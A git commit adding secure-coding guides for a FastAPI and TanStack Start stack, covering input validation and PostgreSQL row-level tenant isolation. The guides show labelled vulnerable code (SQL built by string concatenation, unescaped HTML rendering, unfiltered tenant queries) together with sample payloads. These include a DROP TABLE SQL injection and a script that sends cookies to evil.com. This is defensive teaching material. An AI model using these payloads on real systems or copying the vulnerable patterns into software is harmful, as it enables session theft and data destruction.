Initial commit

This commit is contained in:
Zhongwei Li
2025-11-29 18:29:28 +08:00
commit 5f6dacc74b
19 changed files with 3378 additions and 0 deletions

View File

@@ -0,0 +1,60 @@
# Security Practices Examples
Real-world security implementation examples for Grey Haven's TanStack Start and FastAPI stack.
## Available Examples
1. **[Input Validation](input-validation-example.md)** - Comprehensive input validation patterns
- Zod schemas for TypeScript
- Pydantic models for Python
- Common validation patterns
2. **[Multi-Tenant RLS](multi-tenant-rls-example.md)** - Row Level Security implementation
- RLS policies for PostgreSQL
- Tenant isolation in queries
- Testing tenant separation
3. **[Secret Management](secret-management-example.md)** - Doppler integration
- Setting up Doppler
- Accessing secrets in code
- Environment-specific configs
4. **[Rate Limiting](rate-limiting-example.md)** - Redis-based rate limiting
- Per-user rate limits
- Per-endpoint limits
- Graceful degradation
## Recommended Path
**For new projects:**
1. Start with [secret-management-example.md](secret-management-example.md)
2. Implement [input-validation-example.md](input-validation-example.md)
3. Add [multi-tenant-rls-example.md](multi-tenant-rls-example.md)
4. Finish with [rate-limiting-example.md](rate-limiting-example.md)
**For security reviews:**
1. Check [multi-tenant-rls-example.md](multi-tenant-rls-example.md) for data leakage
2. Verify [input-validation-example.md](input-validation-example.md) is applied
3. Audit [secret-management-example.md](secret-management-example.md) compliance
## Quick Reference
### TypeScript/React Security
- See [input-validation-example.md](input-validation-example.md#typescript)
- See [multi-tenant-rls-example.md](multi-tenant-rls-example.md#typescript)
### Python/FastAPI Security
- See [input-validation-example.md](input-validation-example.md#python)
- See [multi-tenant-rls-example.md](multi-tenant-rls-example.md#python)
## Related Materials
- **[Security Checklist](../checklists/security-audit-checklist.md)** - Pre-deployment verification
- **[OWASP Top 10 Reference](../reference/owasp-top-10.md)** - Common vulnerabilities
- **[Configuration Guide](../reference/security-configuration.md)** - Complete settings
---
**Total Examples**: 4 comprehensive guides
**Stack Coverage**: TanStack Start + FastAPI
**Last Updated**: 2025-11-09

View File

@@ -0,0 +1,570 @@
# Input Validation Security Example
Real-world example demonstrating comprehensive input validation to prevent common security vulnerabilities.
## Scenario
Building a user profile update endpoint that's vulnerable to multiple injection attacks due to insufficient validation.
## Vulnerable Code
### Backend (FastAPI) - BEFORE
```python
# ❌ VULNERABLE CODE - DO NOT USE
from fastapi import FastAPI, HTTPException
from sqlalchemy import text
app = FastAPI()
@app.post("/api/users/{user_id}/profile")
async def update_profile(user_id: str, request: dict):
"""Update user profile - VULNERABLE VERSION"""
# ❌ VULNERABILITY 1: No input validation
name = request.get("name")
bio = request.get("bio")
website = request.get("website")
age = request.get("age")
# ❌ VULNERABILITY 2: SQL Injection via string concatenation
query = text(f"""
UPDATE users
SET name = '{name}',
bio = '{bio}',
website = '{website}',
age = {age}
WHERE id = '{user_id}'
""")
await db.execute(query)
return {"status": "success"}
```
**Attack Examples:**
1. **SQL Injection:**
```python
POST /api/users/123/profile
{
"name": "'; DROP TABLE users; --",
"bio": "innocent bio",
"website": "https://example.com",
"age": 25
}
# Executes: UPDATE users SET name = ''; DROP TABLE users; --', ...
# Result: users table deleted!
```
2. **XSS via Bio Field:**
```python
POST /api/users/123/profile
{
"name": "John",
"bio": "<script>fetch('https://evil.com?cookie='+document.cookie)</script>",
"website": "https://example.com",
"age": 25
}
# Bio stored with script tag, executed when rendered
```
3. **Type Confusion:**
```python
POST /api/users/123/profile
{
"name": "John",
"bio": "Normal bio",
"website": "javascript:alert('XSS')", # Invalid URL scheme
"age": "twenty" # String instead of number - could crash
}
```
### Frontend (TanStack Start) - BEFORE
```typescript
// ❌ VULNERABLE CODE - DO NOT USE
async function updateProfile(userId: string, data: any) {
// ❌ VULNERABILITY: No client-side validation
// ❌ VULNERABILITY: Trusting server data without sanitization
const response = await fetch(`/api/users/${userId}/profile`, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify(data) // No validation
});
return response.json();
}
function ProfileForm() {
const [bio, setBio] = useState('');
const handleSubmit = async (e) => {
e.preventDefault();
await updateProfile(userId, { bio }); // No validation
};
return (
<form onSubmit={handleSubmit}>
<textarea value={bio} onChange={(e) => setBio(e.target.value)} />
{/* ❌ VULNERABILITY: Rendering unescaped HTML */}
<div dangerouslySetInnerHTML={{ __html: bio }} />
<button type="submit">Save</button>
</form>
);
}
```
## Secure Code
### Step 1: Define Validation Schemas
**Frontend:** `src/schemas/user.ts`
```typescript
// ✅ SECURE: Comprehensive Zod schema
import { z } from 'zod';
export const updateProfileSchema = z.object({
name: z
.string()
.min(1, 'Name is required')
.max(100, 'Name must be less than 100 characters')
.regex(/^[a-zA-Z\s'-]+$/, 'Name contains invalid characters')
.transform(str => str.trim()), // Remove whitespace
bio: z
.string()
.max(500, 'Bio must be less than 500 characters')
.transform(str => str.trim())
.optional(),
website: z
.string()
.url('Invalid URL format')
.refine(
(url) => {
// ✅ Only allow http/https schemes
const parsed = new URL(url);
return ['http:', 'https:'].includes(parsed.protocol);
},
{ message: 'URL must use http or https protocol' }
)
.optional(),
age: z
.number()
.int('Age must be an integer')
.min(13, 'Must be at least 13 years old')
.max(120, 'Invalid age')
.optional()
});
export type UpdateProfileInput = z.infer<typeof updateProfileSchema>;
```
**Backend:** `app/schemas/user.py`
```python
# ✅ SECURE: Pydantic model with validation
from pydantic import BaseModel, Field, HttpUrl, validator
import re
class UpdateProfileRequest(BaseModel):
name: str = Field(..., min_length=1, max_length=100)
bio: str | None = Field(None, max_length=500)
website: HttpUrl | None = None # Pydantic validates URL format
age: int | None = Field(None, ge=13, le=120)
@validator('name')
def validate_name(cls, v):
"""Only allow letters, spaces, hyphens, apostrophes"""
if not re.match(r"^[a-zA-Z\s'\-]+$", v):
raise ValueError('Name contains invalid characters')
return v.strip()
@validator('bio')
def validate_bio(cls, v):
"""Strip HTML tags from bio"""
if v:
# Remove HTML tags (basic XSS prevention)
v = re.sub(r'<[^>]*>', '', v)
return v.strip()
return v
@validator('website')
def validate_website(cls, v):
"""Ensure only http/https schemes"""
if v and v.scheme not in ['http', 'https']:
raise ValueError('URL must use http or https protocol')
return v
class Config:
str_strip_whitespace = True # Auto-trim strings
```
### Step 2: Secure Backend Implementation
```python
# ✅ SECURE CODE
from fastapi import FastAPI, HTTPException, Depends
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select, update
from uuid import UUID
import bleach # For HTML sanitization
from app.schemas.user import UpdateProfileRequest
from app.models.user import User
from app.db.session import get_session
from app.api.deps import get_current_user, verify_tenant_access
app = FastAPI()
@app.post("/api/users/{user_id}/profile")
async def update_profile(
user_id: UUID, # ✅ SECURITY: Type validation (must be valid UUID)
data: UpdateProfileRequest, # ✅ SECURITY: Pydantic validation
current_user: User = Depends(get_current_user), # ✅ SECURITY: Authentication
session: AsyncSession = Depends(get_session)
):
"""Update user profile - SECURE VERSION"""
# ✅ SECURITY: Authorization - users can only update their own profile
if current_user.id != user_id:
raise HTTPException(status_code=403, detail="Forbidden")
# ✅ SECURITY: Verify user exists and belongs to correct tenant
stmt = select(User).where(
User.id == user_id,
User.tenant_id == current_user.tenant_id # ✅ SECURITY: Tenant isolation
)
result = await session.execute(stmt)
user = result.scalar_one_or_none()
if not user:
raise HTTPException(status_code=404, detail="User not found")
# ✅ SECURITY: Additional HTML sanitization for bio
sanitized_bio = None
if data.bio:
sanitized_bio = bleach.clean(
data.bio,
tags=[], # No HTML tags allowed
strip=True
)
# ✅ SECURITY: Use ORM (prevents SQL injection)
stmt = (
update(User)
.where(User.id == user_id)
.values(
name=data.name,
bio=sanitized_bio,
website=str(data.website) if data.website else None,
age=data.age
)
)
await session.execute(stmt)
await session.commit()
return {"status": "success"}
```
### Step 3: Secure Frontend Implementation
```typescript
// ✅ SECURE CODE
import { useState } from 'react';
import { z } from 'zod';
import DOMPurify from 'dompurify'; // For HTML sanitization
import { updateProfileSchema, type UpdateProfileInput } from '@/schemas/user';
async function updateProfile(userId: string, data: UpdateProfileInput) {
// ✅ SECURITY: Client-side validation before sending
const validated = updateProfileSchema.parse(data);
const response = await fetch(`/api/users/${userId}/profile`, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': `Bearer ${getToken()}` // ✅ SECURITY: Include auth token
},
body: JSON.stringify(validated)
});
if (!response.ok) {
const error = await response.json();
throw new Error(error.detail);
}
return response.json();
}
function ProfileForm() {
const [formData, setFormData] = useState<Partial<UpdateProfileInput>>({
name: '',
bio: '',
website: '',
age: undefined
});
const [errors, setErrors] = useState<Record<string, string>>({});
const handleSubmit = async (e: React.FormEvent) => {
e.preventDefault();
setErrors({});
try {
// ✅ SECURITY: Validate before submission
const validated = updateProfileSchema.parse(formData);
await updateProfile(userId, validated);
alert('Profile updated successfully');
} catch (error) {
if (error instanceof z.ZodError) {
// Display validation errors
const fieldErrors: Record<string, string> = {};
error.errors.forEach((err) => {
const field = err.path[0] as string;
fieldErrors[field] = err.message;
});
setErrors(fieldErrors);
} else {
alert('Failed to update profile');
}
}
};
// ✅ SECURITY: Sanitize bio before rendering
const sanitizedBio = DOMPurify.sanitize(formData.bio || '', {
ALLOWED_TAGS: [], // No HTML tags
ALLOWED_ATTR: []
});
return (
<form onSubmit={handleSubmit}>
<div>
<label htmlFor="name">Name</label>
<input
id="name"
type="text"
value={formData.name}
onChange={(e) => setFormData({ ...formData, name: e.target.value })}
maxLength={100} // ✅ SECURITY: Client-side length limit
/>
{errors.name && <span className="error">{errors.name}</span>}
</div>
<div>
<label htmlFor="bio">Bio</label>
<textarea
id="bio"
value={formData.bio}
onChange={(e) => setFormData({ ...formData, bio: e.target.value })}
maxLength={500} // ✅ SECURITY: Client-side length limit
/>
{errors.bio && <span className="error">{errors.bio}</span>}
</div>
<div>
<label htmlFor="website">Website</label>
<input
id="website"
type="url" // ✅ SECURITY: Browser validation
value={formData.website}
onChange={(e) => setFormData({ ...formData, website: e.target.value })}
placeholder="https://example.com"
/>
{errors.website && <span className="error">{errors.website}</span>}
</div>
<div>
<label htmlFor="age">Age</label>
<input
id="age"
type="number" // ✅ SECURITY: Browser validation
value={formData.age}
onChange={(e) => setFormData({
...formData,
age: parseInt(e.target.value) || undefined
})}
min={13}
max={120}
/>
{errors.age && <span className="error">{errors.age}</span>}
</div>
{/* ✅ SECURITY: Render sanitized content as text (not HTML) */}
<div>
<h3>Bio Preview</h3>
<p>{sanitizedBio}</p> {/* Text rendering, not dangerouslySetInnerHTML */}
</div>
<button type="submit">Save Profile</button>
</form>
);
}
```
## Testing Validation
### Unit Tests (Frontend)
```typescript
// tests/schemas/user.test.ts
import { describe, test, expect } from 'vitest';
import { updateProfileSchema } from '@/schemas/user';
describe('updateProfileSchema', () => {
test('validates correct input', () => {
const valid = {
name: 'John Doe',
bio: 'Software engineer',
website: 'https://example.com',
age: 30
};
expect(() => updateProfileSchema.parse(valid)).not.toThrow();
});
test('rejects SQL injection in name', () => {
const malicious = {
name: "'; DROP TABLE users; --",
bio: 'Bio',
age: 30
};
expect(() => updateProfileSchema.parse(malicious)).toThrow('Name contains invalid characters');
});
test('rejects javascript: URL scheme', () => {
const malicious = {
name: 'John',
website: 'javascript:alert("XSS")',
age: 30
};
expect(() => updateProfileSchema.parse(malicious)).toThrow('URL must use http or https protocol');
});
test('rejects name > 100 characters', () => {
const tooLong = {
name: 'a'.repeat(101),
age: 30
};
expect(() => updateProfileSchema.parse(tooLong)).toThrow('Name must be less than 100 characters');
});
test('rejects invalid age', () => {
expect(() => updateProfileSchema.parse({ name: 'John', age: 12 }))
.toThrow('Must be at least 13 years old');
expect(() => updateProfileSchema.parse({ name: 'John', age: 150 }))
.toThrow('Invalid age');
});
});
```
### Integration Tests (Backend)
```python
# tests/test_profile.py
import pytest
from fastapi.testclient import TestClient
def test_update_profile_success(client: TestClient, auth_token: str):
"""Test successful profile update with valid data"""
response = client.post(
"/api/users/uuid-123/profile",
headers={"Authorization": f"Bearer {auth_token}"},
json={
"name": "John Doe",
"bio": "Software engineer",
"website": "https://example.com",
"age": 30
}
)
assert response.status_code == 200
assert response.json() == {"status": "success"}
def test_sql_injection_prevented(client: TestClient, auth_token: str):
"""Test that SQL injection is prevented"""
response = client.post(
"/api/users/uuid-123/profile",
headers={"Authorization": f"Bearer {auth_token}"},
json={
"name": "'; DROP TABLE users; --",
"age": 30
}
)
assert response.status_code == 422 # Validation error
assert "Name contains invalid characters" in response.text
def test_xss_sanitized(client: TestClient, auth_token: str):
"""Test that XSS attempts are sanitized"""
response = client.post(
"/api/users/uuid-123/profile",
headers={"Authorization": f"Bearer {auth_token}"},
json={
"name": "John",
"bio": "<script>alert('XSS')</script>",
"age": 30
}
)
assert response.status_code == 200
# Verify bio is sanitized in database
user = get_user("uuid-123")
assert "<script>" not in user.bio # HTML stripped
def test_unauthorized_update_blocked(client: TestClient, other_user_token: str):
"""Test that users cannot update other users' profiles"""
response = client.post(
"/api/users/uuid-OTHER/profile",
headers={"Authorization": f"Bearer {other_user_token}"},
json={"name": "Hacker", "age": 30}
)
assert response.status_code == 403
assert response.json()["detail"] == "Forbidden"
```
## Security Checklist
- [x] **Input validation** on both client and server
- [x] **SQL injection prevention** (using ORM)
- [x] **XSS prevention** (HTML sanitization)
- [x] **Type validation** (Zod, Pydantic)
- [x] **Length limits** enforced
- [x] **URL scheme validation** (http/https only)
- [x] **Authentication** required
- [x] **Authorization** verified (own profile only)
- [x] **Tenant isolation** enforced
- [x] **Comprehensive tests** for security
## Key Takeaways
1. **Never trust client input** - Always validate on server
2. **Use ORMs** - Prevent SQL injection
3. **Sanitize HTML** - Prevent XSS
4. **Validate types** - Prevent type confusion
5. **Enforce limits** - Prevent DoS
6. **Test security** - Write tests for attack vectors
## Related Resources
- [Data Validation Checklist](../../data-quality/skills/data-validation/checklists/data-validation-checklist.md)
- [OWASP Input Validation](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html)
- [Zod Documentation](https://zod.dev)
- [Pydantic Documentation](https://docs.pydantic.dev)
---
**Vulnerabilities Prevented**: SQL Injection, XSS, Type Confusion
**Defense Layers**: Client validation + Server validation + Sanitization
**Impact**: Production security vulnerability → Secure implementation ✅

View File

@@ -0,0 +1,519 @@
# Multi-Tenant Row-Level Security (RLS) Example
Real-world example implementing PostgreSQL RLS policies to enforce tenant isolation in a Grey Haven multi-tenant application.
## Scenario
A SaaS application with multiple tenants (organizations) must ensure complete data isolation. A critical bug allowed Tenant A to access Tenant B's data due to missing RLS policies.
## The Problem
### Vulnerable Architecture (BEFORE)
**Database Schema:** `schema.sql`
```sql
-- ❌ VULNERABLE: No RLS policies
CREATE TABLE tenants (
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
name TEXT NOT NULL,
slug TEXT UNIQUE NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW()
);
CREATE TABLE users (
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
email TEXT UNIQUE NOT NULL,
name TEXT NOT NULL,
tenant_id UUID NOT NULL REFERENCES tenants(id),
created_at TIMESTAMPTZ DEFAULT NOW()
);
CREATE TABLE projects (
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
name TEXT NOT NULL,
description TEXT,
tenant_id UUID NOT NULL REFERENCES tenants(id),
owner_id UUID NOT NULL REFERENCES users(id),
created_at TIMESTAMPTZ DEFAULT NOW()
);
-- ❌ PROBLEM: No RLS policies!
-- Any user with database access can query all data
```
**Backend API:** `app/api/v1/projects.py`
```python
# ❌ VULNERABLE CODE
from fastapi import APIRouter, Depends
from sqlmodel import select
from app.models.project import Project
from app.api.deps import get_session, get_current_user
router = APIRouter()
@router.get("/projects")
async def list_projects(
session = Depends(get_session),
current_user = Depends(get_current_user)
):
"""List all projects - VULNERABLE VERSION"""
# ❌ PROBLEM: No tenant filtering!
# Returns ALL projects from ALL tenants
stmt = select(Project)
result = await session.execute(stmt)
projects = result.scalars().all()
return {"projects": projects}
```
**Attack Scenario:**
1. Attacker (Tenant A) logs in normally
2. Uses DevTools to intercept API request
3. Modifies request to query arbitrary project IDs
4. Receives data from Tenant B's projects!
```bash
# Attacker's request
GET /api/projects/uuid-from-tenant-b
# ❌ Response includes Tenant B data!
{
"id": "uuid-from-tenant-b",
"name": "Secret Project",
"tenant_id": "tenant-b-uuid",
"description": "Confidential data..."
}
```
## The Solution: PostgreSQL RLS
### Step 1: Enable RLS on All Tables
```sql
-- ✅ SECURITY: Enable RLS on all multi-tenant tables
ALTER TABLE users ENABLE ROW LEVEL SECURITY;
ALTER TABLE projects ENABLE ROW LEVEL SECURITY;
ALTER TABLE documents ENABLE ROW LEVEL SECURITY;
ALTER TABLE comments ENABLE ROW LEVEL SECURITY;
-- ... enable on ALL tables with tenant_id
```
### Step 2: Create RLS Policies
```sql
-- ✅ SECURITY: Tenant isolation policy for users table
CREATE POLICY tenant_isolation ON users
USING (tenant_id = current_setting('app.tenant_id')::uuid);
-- ✅ SECURITY: Tenant isolation policy for projects table
CREATE POLICY tenant_isolation ON projects
USING (tenant_id = current_setting('app.tenant_id')::uuid);
-- ✅ SECURITY: Tenant isolation policy for documents table
CREATE POLICY tenant_isolation ON documents
USING (tenant_id = current_setting('app.tenant_id')::uuid);
-- ✅ SECURITY: Tenant isolation policy for comments table
CREATE POLICY tenant_isolation ON comments
USING (tenant_id = current_setting('app.tenant_id')::uuid);
```
**How RLS Works:**
- `USING (condition)` - Applied to SELECT, UPDATE, DELETE
- `current_setting('app.tenant_id')` - Session variable set per request
- Only rows matching condition are visible/modifiable
### Step 3: Admin Bypass Policy (Optional)
For admin users who need cross-tenant access:
```sql
-- ✅ SECURITY: Admin bypass policy
CREATE POLICY admin_full_access ON projects
USING (
current_setting('app.user_role', true) = 'admin'
OR tenant_id = current_setting('app.tenant_id')::uuid
);
-- Note: Use WITH CHECK for INSERT/UPDATE policies
CREATE POLICY admin_full_access_insert ON projects
FOR INSERT
WITH CHECK (
current_setting('app.user_role', true) = 'admin'
OR tenant_id = current_setting('app.tenant_id')::uuid
);
```
### Step 4: Set Tenant Context in Application
**Backend:** `app/api/deps.py`
```python
# ✅ SECURE: Set tenant context for each request
from fastapi import Depends, HTTPException
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import text
from app.db.session import get_session
from app.models.user import User
async def set_tenant_context(
current_user: User = Depends(get_current_user),
session: AsyncSession = Depends(get_session)
):
"""Set PostgreSQL session variables for RLS"""
# ✅ SECURITY: Set tenant_id from authenticated user
await session.execute(
text("SET LOCAL app.tenant_id = :tenant_id"),
{"tenant_id": str(current_user.tenant_id)}
)
# ✅ SECURITY: Set user role for admin bypass (if needed)
await session.execute(
text("SET LOCAL app.user_role = :role"),
{"role": current_user.role}
)
return current_user
```
**Usage in API Endpoints:**
```python
# ✅ SECURE CODE
from fastapi import APIRouter, Depends
from sqlmodel import select
from app.models.project import Project
from app.api.deps import get_session, set_tenant_context
router = APIRouter()
@router.get("/projects")
async def list_projects(
session = Depends(get_session),
current_user = Depends(set_tenant_context) # ✅ Sets tenant context
):
"""List projects - SECURE VERSION"""
# ✅ SECURITY: RLS automatically filters by tenant_id
# No manual WHERE clause needed!
stmt = select(Project)
result = await session.execute(stmt)
projects = result.scalars().all()
# Only returns projects from current_user.tenant_id
return {"projects": projects}
@router.get("/projects/{project_id}")
async def get_project(
project_id: str,
session = Depends(get_session),
current_user = Depends(set_tenant_context) # ✅ Sets tenant context
):
"""Get single project - SECURE VERSION"""
# ✅ SECURITY: RLS automatically filters
# If project belongs to different tenant, returns None
stmt = select(Project).where(Project.id == project_id)
result = await session.execute(stmt)
project = result.scalar_one_or_none()
if not project:
raise HTTPException(status_code=404, detail="Project not found")
return project
```
### Step 5: Database Migration
**Alembic migration:** `alembic/versions/xxx_enable_rls.py`
```python
"""Enable RLS on all multi-tenant tables"""
from alembic import op
def upgrade():
# Enable RLS
op.execute("ALTER TABLE users ENABLE ROW LEVEL SECURITY")
op.execute("ALTER TABLE projects ENABLE ROW LEVEL SECURITY")
op.execute("ALTER TABLE documents ENABLE ROW LEVEL SECURITY")
# Create policies
op.execute("""
CREATE POLICY tenant_isolation ON users
USING (tenant_id = current_setting('app.tenant_id')::uuid)
""")
op.execute("""
CREATE POLICY tenant_isolation ON projects
USING (tenant_id = current_setting('app.tenant_id')::uuid)
""")
op.execute("""
CREATE POLICY tenant_isolation ON documents
USING (tenant_id = current_setting('app.tenant_id')::uuid)
""")
def downgrade():
# Drop policies
op.execute("DROP POLICY IF EXISTS tenant_isolation ON users")
op.execute("DROP POLICY IF EXISTS tenant_isolation ON projects")
op.execute("DROP POLICY IF EXISTS tenant_isolation ON documents")
# Disable RLS
op.execute("ALTER TABLE users DISABLE ROW LEVEL SECURITY")
op.execute("ALTER TABLE projects DISABLE ROW LEVEL SECURITY")
op.execute("ALTER TABLE documents DISABLE ROW LEVEL SECURITY")
```
## Testing RLS
### Unit Tests
```python
# tests/test_rls.py
import pytest
from sqlalchemy import text
from app.models.user import User
from app.models.project import Project
@pytest.mark.asyncio
async def test_rls_isolates_tenants(session):
"""Test that RLS prevents cross-tenant access"""
# Create two tenants
tenant_a_id = "uuid-tenant-a"
tenant_b_id = "uuid-tenant-b"
# Create projects for each tenant
project_a = Project(name="Project A", tenant_id=tenant_a_id)
project_b = Project(name="Project B", tenant_id=tenant_b_id)
session.add_all([project_a, project_b])
await session.commit()
# ✅ TEST: Set context to Tenant A
await session.execute(
text("SET LOCAL app.tenant_id = :tenant_id"),
{"tenant_id": tenant_a_id}
)
# Query all projects
result = await session.execute(select(Project))
projects = result.scalars().all()
# ✅ ASSERTION: Should only see Tenant A's project
assert len(projects) == 1
assert projects[0].id == project_a.id
assert projects[0].tenant_id == tenant_a_id
# ✅ TEST: Attempt to query Tenant B's project directly
result = await session.execute(
select(Project).where(Project.id == project_b.id)
)
forbidden_project = result.scalar_one_or_none()
# ✅ ASSERTION: Should be None (RLS blocks access)
assert forbidden_project is None
@pytest.mark.asyncio
async def test_admin_bypass(session):
"""Test that admin role can access all tenants"""
# Set context with admin role
await session.execute(
text("SET LOCAL app.tenant_id = :tenant_id"),
{"tenant_id": "uuid-tenant-a"}
)
await session.execute(
text("SET LOCAL app.user_role = 'admin'")
)
# Query all projects
result = await session.execute(select(Project))
projects = result.scalars().all()
# ✅ ASSERTION: Admin sees ALL projects
assert len(projects) == 2 # Sees both Tenant A and B
```
### Integration Tests
```python
# tests/test_api_rls.py
import pytest
from fastapi.testclient import TestClient
def test_api_tenant_isolation(client: TestClient, tenant_a_token: str, tenant_b_project_id: str):
"""Test that API enforces tenant isolation"""
# Tenant A user tries to access Tenant B's project
response = client.get(
f"/api/projects/{tenant_b_project_id}",
headers={"Authorization": f"Bearer {tenant_a_token}"}
)
# ✅ ASSERTION: Should return 404 (RLS hides the project)
assert response.status_code == 404
assert response.json()["detail"] == "Project not found"
def test_api_own_tenant_access(client: TestClient, tenant_a_token: str, tenant_a_project_id: str):
"""Test that users can access their own tenant's data"""
response = client.get(
f"/api/projects/{tenant_a_project_id}",
headers={"Authorization": f"Bearer {tenant_a_token}"}
)
# ✅ ASSERTION: Should succeed
assert response.status_code == 200
assert response.json()["id"] == tenant_a_project_id
```
## Advanced: Separate Policies for CRUD
For fine-grained control, create separate policies for each operation:
```sql
-- SELECT policy (read access)
CREATE POLICY tenant_select ON projects
FOR SELECT
USING (tenant_id = current_setting('app.tenant_id')::uuid);
-- INSERT policy (create access)
CREATE POLICY tenant_insert ON projects
FOR INSERT
WITH CHECK (
tenant_id = current_setting('app.tenant_id')::uuid
AND owner_id = current_setting('app.user_id')::uuid
);
-- UPDATE policy (modify access)
CREATE POLICY tenant_update ON projects
FOR UPDATE
USING (
tenant_id = current_setting('app.tenant_id')::uuid
AND owner_id = current_setting('app.user_id')::uuid
)
WITH CHECK (tenant_id = current_setting('app.tenant_id')::uuid);
-- DELETE policy (delete access)
CREATE POLICY tenant_delete ON projects
FOR DELETE
USING (
tenant_id = current_setting('app.tenant_id')::uuid
AND owner_id = current_setting('app.user_id')::uuid
);
```
## Monitoring & Auditing
### Log RLS Context
```python
import structlog
logger = structlog.get_logger()
async def set_tenant_context(current_user: User, session: AsyncSession):
"""Set tenant context with audit logging"""
await session.execute(
text("SET LOCAL app.tenant_id = :tenant_id"),
{"tenant_id": str(current_user.tenant_id)}
)
# ✅ AUDIT: Log tenant context for security monitoring
logger.info(
"tenant_context_set",
user_id=str(current_user.id),
tenant_id=str(current_user.tenant_id),
role=current_user.role
)
return current_user
```
### Verify RLS is Active
```python
# Startup check
@app.on_event("startup")
async def verify_rls():
"""Verify RLS is enabled on all tables"""
async with AsyncSession(engine) as session:
result = await session.execute(text("""
SELECT tablename
FROM pg_tables
WHERE schemaname = 'public'
AND tablename IN ('users', 'projects', 'documents')
AND NOT EXISTS (
SELECT 1 FROM pg_policy
WHERE tablename = pg_tables.tablename
)
"""))
tables_without_rls = result.scalars().all()
if tables_without_rls:
raise RuntimeError(
f"RLS not enabled on tables: {tables_without_rls}"
)
print("✅ RLS verified on all tables")
```
## Security Checklist
- [x] **RLS enabled** on all multi-tenant tables
- [x] **Policies created** for tenant isolation
- [x] **Tenant context** set on every request
- [x] **No manual WHERE clauses** for tenant_id (RLS handles it)
- [x] **Admin bypass** implemented securely (if needed)
- [x] **Tests verify** cross-tenant access is blocked
- [x] **Audit logging** for tenant context changes
- [x] **Startup checks** verify RLS is active
- [x] **Migration** to enable RLS on existing data
## Key Takeaways
1. **RLS is defense in depth** - Even if application code forgets tenant filtering, database enforces it
2. **Set context per request** - Not per session (sessions can be reused)
3. **Test isolation** - Write tests that verify cross-tenant access is blocked
4. **Don't trust application layer alone** - Bugs happen, RLS is the safety net
5. **Monitor RLS context** - Log when tenant context is set for audit trail
## Common Pitfalls
**Don't:**
- Forget to set tenant context (query will return no rows)
- Use global tenant context (sessions can be reused)
- Skip RLS on "internal" tables (all multi-tenant tables need RLS)
- Assume application-level checks are sufficient
- Disable RLS in production (even temporarily)
**Do:**
- Enable RLS on ALL multi-tenant tables
- Set tenant context at request start (dependency injection)
- Test cross-tenant isolation thoroughly
- Monitor RLS context in logs
- Use RLS + application-level checks (defense in depth)
## Related Resources
- [Authentication Security Checklist](../checklists/authentication-security-checklist.md)
- [PostgreSQL RLS Documentation](https://www.postgresql.org/docs/current/ddl-rowsecurity.html)
- [Input Validation Example](./input-validation-example.md)
---
**Vulnerability**: Cross-tenant data access
**Solution**: PostgreSQL Row-Level Security (RLS)
**Impact**: Complete tenant isolation at database layer ✅
**Defense Layer**: Database-level (cannot be bypassed by application bugs)